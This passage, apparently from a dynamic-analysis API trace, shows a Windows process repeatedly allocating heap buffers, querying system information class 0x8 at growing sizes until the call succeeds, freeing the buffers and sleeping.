ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0293.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0293.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0293.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.925] Sleep (dwMilliseconds=0x110) [0293.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0293.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0293.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0293.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0293.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0293.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0293.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0293.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0293.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.941] Sleep (dwMilliseconds=0x110) [0293.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0293.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0293.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0293.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0293.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0293.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0293.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0293.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0293.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.957] Sleep (dwMilliseconds=0x110) [0293.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0293.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0293.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0293.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0293.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0293.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0293.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.974] Sleep (dwMilliseconds=0x110) [0293.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0293.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0293.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0293.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0293.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0293.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0293.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.988] Sleep (dwMilliseconds=0x110) [0294.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0294.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0294.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0294.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0294.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0294.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0294.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0294.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0294.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.006] Sleep (dwMilliseconds=0x110) [0294.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0294.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0294.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0294.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0294.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0294.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0294.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0294.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0294.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.035] Sleep (dwMilliseconds=0x110) [0294.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0294.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0294.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0294.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0294.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0294.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0294.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0294.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0294.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.051] Sleep (dwMilliseconds=0x110) [0294.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0294.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0294.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0294.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0294.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0294.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0294.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.063] Sleep (dwMilliseconds=0x110) [0294.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0294.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0294.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0294.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0294.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0294.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0294.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0294.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0294.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.080] Sleep (dwMilliseconds=0x110) [0294.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0294.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0294.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0294.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0294.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0294.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0294.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.093] Sleep (dwMilliseconds=0x110) [0294.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0294.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0294.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0294.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0294.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0294.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0294.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0294.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0294.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.114] Sleep (dwMilliseconds=0x110) [0294.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0294.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0294.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0294.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0294.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0294.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0294.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0294.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0294.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.128] Sleep (dwMilliseconds=0x110) [0294.168] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0294.168] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.168] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0294.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0294.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0294.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0294.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0294.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0294.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0294.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.171] Sleep (dwMilliseconds=0x110) [0294.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0294.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0294.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0294.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0294.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, 